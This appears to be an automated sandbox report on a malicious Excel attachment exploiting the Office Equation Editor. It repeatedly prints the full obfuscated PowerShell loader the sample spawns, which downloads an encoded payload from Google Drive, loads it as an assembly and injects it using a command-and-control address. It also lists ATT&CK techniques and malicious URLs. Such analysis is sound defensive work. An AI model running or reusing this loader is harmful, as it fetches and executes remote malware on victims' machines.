    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHh5cGVuZEluZGV4JysnIC1ndCB4eXBzdGFydEluZGV4O3h5cHN0YXJ0SW5kZXggKz0gJysneHlwc3RhcnRGbGFnLkxlbmd0aDt4eXBiYXNlNjRMZW5ndGggPSB4JysneXBlbmRJbmRleCAtIHh5cHN0YXJ0SW5kZXg7eHlwYmFzZTY0Q29tbWFuZCA9IHh5cGltYWdlJysnVGV4dC5TdWJzdHJpbmcoeHlwc3RhcnRJbmRleCwgeHlwYmFzZTY0TGUnKyduZ3RoKScrJzt4eXBiYXNlNicrJzRSZXZlcnNlZCA9IC1qb2luICh4eXBiYXNlNjRDb21tYW5kLlRvQ2hhckEnKydycmF5KCkgV1ZvIEZvckVhY2gtJysnT2JqZWN0IHsgeHlwXyB9KVstMS4uLSh4eXBiJysnYXNlNjRDb21tYW5kLkxlbmd0aCldO3h5cGNvbW1hbmRCeXRlcycrJyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoeHlwYmFzZTY0UmV2ZXJzZWQpO3h5cGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh4eXBjbycrJ21tYW5kQnl0ZXMpO3h5cHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRobycrJ2QoVFg2VkFJVFg2KTt4eXB2YWlNZXRob2QuSW52b2tlKHh5cG51bGwsIEAoVFg2dHh0JysnLllBRFNFVVQvMjQxLjYxMi4zLjI5MS8vOnB0dGhUWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNkFkZEluUHJvY2VzczMyVFg2LCBUWDZkZXNhdGl2YWRvVFg2LCcrJyBUWDZkZXNhdGl2YWRvVFg2LFRYNicrJ1RYNixUWDZUWDYsVFg2VFg2LFRYNlRYNixUWDZUWDYsVFg2MVRYNikpOycpIC1DckVQbEFDRSAnV1ZvJyxbQ0hBUl0xMjQgIC1DckVQbEFDRSAgKFtDSEFSXTEyMCtbQ0hBUl0xMjErW0NIQVJdMTEyKSxbQ0hBUl0zNiAtQ3JFUGxBQ0UoW0NIQVJdODQrW0NIQVJdODgrW0NIQVJdNTQpLFtDSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaystuff.vbs" Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHh5cGVuZEluZGV4JysnIC1ndCB4eXBzdGFydEluZGV4O3h5cHN0YXJ0SW5kZXggKz0gJysneHlwc3RhcnRGbGFnLkxlbmd0aDt4eXBiYXNlNjRMZW5ndGggPSB4JysneXBlbmRJbmRleCAtIHh5cHN0YXJ0SW5kZXg7eHlwYmFzZTY0Q29tbWFuZCA9IHh5cGltYWdlJysnVGV4dC5TdWJzdHJpbmcoeHlwc3RhcnRJbmRleCwgeHlwYmFzZTY0TGUnKyduZ3RoKScrJzt4eXBiYXNlNicrJzRSZXZlcnNlZCA9IC1qb2luICh4eXBiYXNlNjRDb21tYW5kLlRvQ2hhckEnKydycmF5KCkgV1ZvIEZvckVhY2gtJysnT2JqZWN0IHsgeHlwXyB9KVstMS4uLSh4eXBiJysnYXNlNjRDb21tYW5kLkxlbmd0aCldO3h5cGNvbW1hbmRCeXRlcycrJyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoeHlwYmFzZTY0UmV2ZXJzZWQpO3h5cGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh4eXBjbycrJ21tYW5kQnl0ZXMpO3h5cHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRobycrJ2QoVFg2VkFJVFg2KTt4eXB2YWlNZXRob2QuSW52b2tlKHh5cG51bGwsIEAoVFg2dHh0JysnLllBRFNFVVQvMjQxLjYxMi4zLjI5MS8vOnB0dGhUWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNkFkZEluUHJvY2VzczMyVFg2LCBUWDZkZXNhdGl2YWRvVFg2LCcrJyBUWDZkZXNhdGl2YWRvVFg2LFRYNicrJ1RYNixUWDZUWDYsVFg2VFg2LFRYNlRYNixUWDZUWDYsVFg2MVRYNikpOycpIC1DckVQbEFDRSAnV1ZvJyxbQ0hBUl0xMjQgIC1DckVQbEFDRSAgKFtDSEFSXTEyMCtbQ0hBUl0xMjErW0NIQVJdMTEyKSxbQ0hBUl0zNiAtQ3JFUGxBQ0UoW0NIQVJdODQrW0NIQVJdODgrW0NIQVJdNTQpLFtDSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX6,TX6TX6,TX6TX6,TX6TX6,TX61TX6));') -CrEPlACE 'WVo',[CHAR]124 -CrEPlACE ([CHAR]120+[CHAR]121+[CHAR]112),[CHAR]36 -CrEPlACE([CHAR]84+[CHAR]88+[CHAR]54),[CHAR]39))"Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'swv4kcgoj3h5cgltywdlvxjsid0gvfg2ahr0chm6ly9kcml2zs5nb29nbguujysny28nkydtl3vjjysnp2v4cg9ydd1kb3dubg8nkydhzczpzd0xlvdkz2vxmgzyowfbcgrsu1c5zgxumvbjx0tfr3bmshagvfg2o3h5chdlyknsawvudca9ie5ldy1pjysnyicrj2plyycrj3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7ehlwaw1hz2vcexrlcya9ihh5chdlyknsawvudc5eb3dubg9hzerhdgeoehlwaw1hz2vvcmwpo3h5cgltywdlvgv4dca9ifttexn0zw0uvgv4dc4nkydfbmnvjysnzgluz106olvurjgur2v0u3ryaw5nkhh5cgltywdlqicrj3l0zxmpo3h5chn0yxj0rmxhzya9ifrynjw8jysnqkftrty0x1nuqvjupj5uwccrjzy7ehlwzw5krmxhzya9ifrynjw8jysnqkftrty0x0vord4+vfg2o3h5chn0yxj0sscrj25kzxggpsb4exbpbwfnzvrlehqusw5kzxgnkydpzih4exbzdgfydeynkydsywcpo3gnkyd5cgvuzeluzgv4id0gehlwaw0nkydhz2vuzxh0lkluzgv4t2yoehlwjysnzw5krmxhzyk7ehlwc3rhcnrjbmrlecatz2ugmcatyw5kihh5cgvuzeluzgv4jysnic1ndcb4exbzdgfydeluzgv4o3h5chn0yxj0sw5kzxggkz0gjysnehlwc3rhcnrgbgfnlkxlbmd0adt4exbiyxnlnjrmzw5ndgggpsb4jysnexblbmrjbmrlecatihh5chn0yxj0sw5kzxg7ehlwymfzzty0q29tbwfuzca9ihh5cgltywdljysnvgv4dc5tdwjzdhjpbmcoehlwc3rhcnrjbmrlecwgehlwymfzzty0tgunkyduz3rokscrjzt4exbiyxnlnicrjzrszxzlcnnlzca9ic1qb2luich4exbiyxnlnjrdb21tyw5kllrvq2hhckenkydycmf5kckgv1zviezvckvhy2gtjysnt2jqzwn0ihsgehlwxyb9kvstms4ulsh4exbijysnyxnlnjrdb21tyw5klkxlbmd0acldo3h5cgnvbw1hbmrcexrlcycrjya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoehlwymfzzty0umv2zxjzzwqpo3h5cgxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzch4exbjbycrj21tyw5kqnl0zxmpo3h5chzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzscrj3rnzxrobycrj2qovfg2vkfjvfg2ktt4exb2ywlnzxrob2qusw52b2tlkhh5cg51bgwsieaovfg2dhh0jysnlllbrfnfvvqvmjqxljyxmi4zlji5ms8vonb0dghuwdysifrynmrlc2f0axzhzg9uwdysifrynmrlc2f0axzhzg9uwdysifrynmrlc2f0axzhzg9uwdysifrynkfkzeluuhjvy2vzczmyvfg2lcbuwdzkzxnhdgl2ywrvvfg2lccrjybuwdzkzxnhdgl2ywrvvfg2lfrynicrj1rynixuwdzuwdysvfg2vfg2lfrynlrynixuwdzuwdysvfg2mvrynikpoycpic1dckvqbefdrsanv1zvjyxbq0hbul0xmjqgic1dckvqbefdrsagkftdsefsxteymctbq0hbul0xmjerw0niqvjdmteyksxbq0hbul0zniatq3jfugxbq0uow0niqvjdodqrw0niqvjdodgrw0niqvjdntqplftdsefsxtm5ksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex((('xypimageurl = tx6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-wdgeq0fx9aapdlsw9dln1pc_kegpfhp tx6;xypwebclient = new-o'+'b'+'jec'+'t system.net.webclient;xypimagebytes = xypwebclient.downloaddata(xypimageurl);xypimagetext = [system.text.'+'enco'+'ding]::utf8.getstring(xypimageb'+'ytes);xypstartflag = tx6<<'+'base64_start>>tx'+'6;xypendflag = tx6<<'+'base64_end>>tx6;xypstarti'+'ndex = xypimagetext.index'+'of(xypstartf'+'lag);x'+'ypendindex = xypim'+'agetext.indexof(xyp'+'endflag);xypstartindex -ge 0 -and xypendindex'+' -gt xypstartindex;xypstartindex += '+'xypstartflag.length;xypbase64length = x'+'ypendindex - xypstartindex;xypbase64command = xypimage'+'text.substring(xypstartindex, xypbase64le'+'ngth)'+';xypbase6'+'4reversed = -join (xypbase64command.tochara'+'rray() wvo foreach-'+'object { xyp_ })[-1..-(xypb'+'ase64command.length)];xypcommandbytes'+' = [system.convert]::frombase64string(xypbase64reversed);xyploadedassembly = [system.reflection.assembly]::load(xypco'+'mmandbytes);xypvaimethod = [dnlib.io.home].ge'+'tmetho'+'d(tx6vaitx6);xypvaimethod.invoke(xypnull, @(tx6txt'+'.yadseut/241.612.3.291//:ptthtx6, tx6desativadotx6, tx6desativadotx6, tx6desativadotx6, tx6addinprocess32tx6, tx6desativadotx6,'+' tx6desativadotx6,tx6'+'tx6,tx6tx6,tx6tx6,tx6tx6,tx6tx6,tx61tx6));') -creplace 'wvo',[char]124 -creplace ([char]120+[char]121+[char]112),[char]36 -creplace([char]84+[char]88+[char]54),[char]39))"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'swv4kcgoj3h5cgltywdlvxjsid0gvfg2ahr0chm6ly9kcml2zs5nb29nbguujysny28nkydtl3vjjysnp2v4cg9ydd1kb3dubg8nkydhzczpzd0xlvdkz2vxmgzyowfbcgrsu1c5zgxumvbjx0tfr3bmshagvfg2o3h5chdlyknsawvudca9ie5ldy1pjysnyicrj2plyycrj3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7ehlwaw1hz2vcexrlcya9ihh5chdlyknsawvudc5eb3dubg9hzerhdgeoehlwaw1hz2vvcmwpo3h5cgltywdlvgv4dca9ifttexn0zw0uvgv4dc4nkydfbmnvjysnzgluz106olvurjgur2v0u3ryaw5nkhh5cgltywdlqicrj3l0zxmpo3h5chn0yxj0rmxhzya9ifrynjw8jysnqkftrty0x1nuqvjupj5uwccrjzy7ehlwzw5krmxhzya9ifrynjw8jysnqkftrty0x0vord4+vfg2o3h5chn0yxj0sscrj25kzxggpsb4exbpbwfnzvrlehqusw5kzxgnkydpzih4exbzdgfydeynkydsywcpo3gnkyd5cgvuzeluzgv4id0gehlwaw0nkydhz2vuzxh0lkluzgv4t2yoehlwjysnzw5krmxhzyk7ehlwc3rhcnrjbmrlecatz2ugmcatyw5kihh5cgvuzeluzgv4jysnic1ndcb4exbzdgfydeluzgv4o3h5chn0yxj0sw5kzxggkz0gjysnehlwc3rhcnrgbgfnlkxlbmd0adt4exbiyxnlnjrmzw5ndgggpsb4jysnexblbmrjbmrlecatihh5chn0yxj0sw5kzxg7ehlwymfzzty0q29tbwfuzca9ihh5cgltywdljysnvgv4dc5tdwjzdhjpbmcoehlwc3rhcnrjbmrlecwgehlwymfzzty0tgunkyduz3rokscrjzt4exbiyxnlnicrjzrszxzlcnnlzca9ic1qb2luich4exbiyxnlnjrdb21tyw5kllrvq2hhckenkydycmf5kckgv1zviezvckvhy2gtjysnt2jqzwn0ihsgehlwxyb9kvstms4ulsh4exbijysnyxnlnjrdb21tyw5klkxlbmd0acldo3h5cgnvbw1hbmrcexrlcycrjya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoehlwymfzzty0umv2zxjzzwqpo3h5cgxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzch4exbjbycrj21tyw5kqnl0zxmpo3h5chzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzscrj3rnzxrobycrj2qovfg2vkfjvfg2ktt4exb2ywlnzxrob2qusw52b2tlkhh5cg51bgwsieaovfg2dhh0jysnlllbrfnfvvqvmjqxljyxmi4zlji5ms8vonb0dghuwdysifrynmrlc2f0axzhzg9uwdysifrynmrlc2f0axzhzg9uwdysifrynmrlc2f0axzhzg9uwdysifrynkfkzeluuhjvy2vzczmyvfg2lcbuwdzkzxnhdgl2ywrvvfg2lccrjybuwdzkzxnhdgl2ywrvvfg2lfrynicrj1rynixuwdzuwdysvfg2vfg2lfrynlrynixuwdzuwdysvfg2mvrynikpoycpic1dckvqbefdrsanv1zvjyxbq0hbul0xmjqgic1dckvqbefdrsagkftdsefsxteymctbq0hbul0xmjerw0niqvjdmteyksxbq0hbul0zniatq3jfugxbq0uow0niqvjdodqrw0niqvjdodgrw0niqvjdntqplftdsefsxtm5ksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex((('xypimageurl = tx6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-wdgeq0fx9aapdlsw9dln1pc_kegpfhp tx6;xypwebclient = new-o'+'b'+'jec'+'t system.net.webclient;xypimagebytes = xypwebclient.downloaddata(xypimageurl);xypimagetext = [system.text.'+'enco'+'ding]::utf8.getstring(xypimageb'+'ytes);xypstartflag = tx6<<'+'base64_start>>tx'+'6;xypendflag = tx6<<'+'base64_end>>tx6;xypstarti'+'ndex = xypimagetext.index'+'of(xypstartf'+'lag);x'+'ypendindex = xypim'+'agetext.indexof(xyp'+'endflag);xypstartindex -ge 0 -and xypendindex'+' -gt xypstartindex;xypstartindex += '+'xypstartflag.length;xypbase64length = x'+'ypendindex - xypstartindex;xypbase64command = xypimage'+'text.substring(xypstartindex, xypbase64le'+'ngth)'+';xypbase6'+'4reversed = -join (xypbase64command.tochara'+'rray() wvo foreach-'+'object { xyp_ })[-1..-(xypb'+'ase64command.length)];xypcommandbytes'+' = [system.convert]::frombase64string(xypbase64reversed);xyploadedassembly = [system.reflection.assembly]::load(xypco'+'mmandbytes);xypvaimethod = [dnlib.io.home].ge'+'tmetho'+'d(tx6vaitx6);xypvaimethod.invoke(xypnull, @(tx6txt'+'.yadseut/241.612.3.291//:ptthtx6, tx6desativadotx6, tx6desativadotx6, tx6desativadotx6, tx6addinprocess32tx6, tx6desativadotx6,'+' tx6desativadotx6,tx6'+'tx6,tx6tx6,tx6tx6,tx6tx6,tx6tx6,tx61tx6));') -creplace 'wvo',[char]124 -creplace ([char]120+[char]121+[char]112),[char]36 -creplace([char]84+[char]88+[char]54),[char]39))"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information211
    Scripting
    Valid Accounts121
    Command and Scripting Interpreter
    211
    Scripting
    111
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote ServicesData from Local System1
    Web Service
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts43
    Exploitation for Client Execution
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    Modify Registry
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable Media1
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts3
    PowerShell
    Logon Script (Windows)Logon Script (Windows)21
    Virtualization/Sandbox Evasion
    Security Account Manager21
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive3
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
    Process Injection
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Deobfuscate/Decode Files or Information
    LSA Secrets1
    Remote System Discovery
    SSHKeylogging13
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Obfuscated Files or Information
    Cached Domain Credentials1
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    Install Root Certificate
    DCSync13
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    DLL Side-Loading
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1540839 Sample: Comprobante de pago.xlam.xlsx Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 43 Malicious sample detected (through community Yara rule) 2->43 45 Antivirus / Scanner detection for submitted sample 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 16 other signatures 2->49 9 EXCEL.EXE 6 9 2->9         started        process3 file4 27 C:\Users\...\~$Comprobante de pago.xlam.xlsx, data 9->27 dropped 12 EQNEDT32.EXE 12 9->12         started        process5 dnsIp6 41 192.3.216.142, 49161, 80 AS-COLOCROSSINGUS United States 12->41 29 C:\Users\user\AppData\...\wednesdaystuff.vbs, Unicode 12->29 dropped 31 C:\Users\...\WEDNESDAY-constraints[1].vbs, Unicode 12->31 dropped 65 Office equation editor establishes network connection 12->65 67 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->67 17 wscript.exe 1 12->17         started        file7 signatures8 process9 dnsIp10 33 paste.ee 17->33 35 paste.ee 188.114.97.3, 443, 49162, 49163 CLOUDFLARENETUS European Union 17->35 51 System process connects to network (likely due to code injection or exploit) 17->51 53 Suspicious powershell command line found 17->53 55 Wscript starts Powershell (via cmd or directly) 17->55 59 4 other signatures 17->59 21 powershell.exe 4 17->21         started        signatures11 57 Connects to a pastebin service (likely for C&C) 33->57 process12 signatures13 61 Suspicious powershell command line found 21->61 63 Obfuscated command line found 21->63 24 powershell.exe 12 5 21->24         started        process14 dnsIp15 37 drive.usercontent.google.com 216.58.212.129, 443, 49165 GOOGLEUS United States 24->37 39 drive.google.com 216.58.212.174, 443, 49164 GOOGLEUS United States 24->39

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Comprobante de pago.xlam.xlsx68%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
    Comprobante de pago.xlam.xlsx100%AviraEXP/CVE-2017-11882.Gen
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    http://crl.entrust.net/server1.crl00%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://go.micros0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://nuget.org/nuget.exe0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
    https://secure.comodo.com/CPS00%URL Reputationsafe
    http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    paste.ee
    188.114.97.3
    truetrue
      unknown
      drive.google.com
      216.58.212.174
      truefalse
        unknown
        drive.usercontent.google.com
        216.58.212.129
        truefalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://192.3.216.142/WEDNESDAY-constraints.vbstrue
            unknown
            https://paste.ee/d/KXy1Ftrue
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.490773902.0000000003589000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://192.3.216.142/WEDNESDAY-constraints.vbszzC:EQNEDT32.EXE, 00000002.00000002.471678397.00000000005ED000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                http://crl.entrust.net/server1.crl0wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
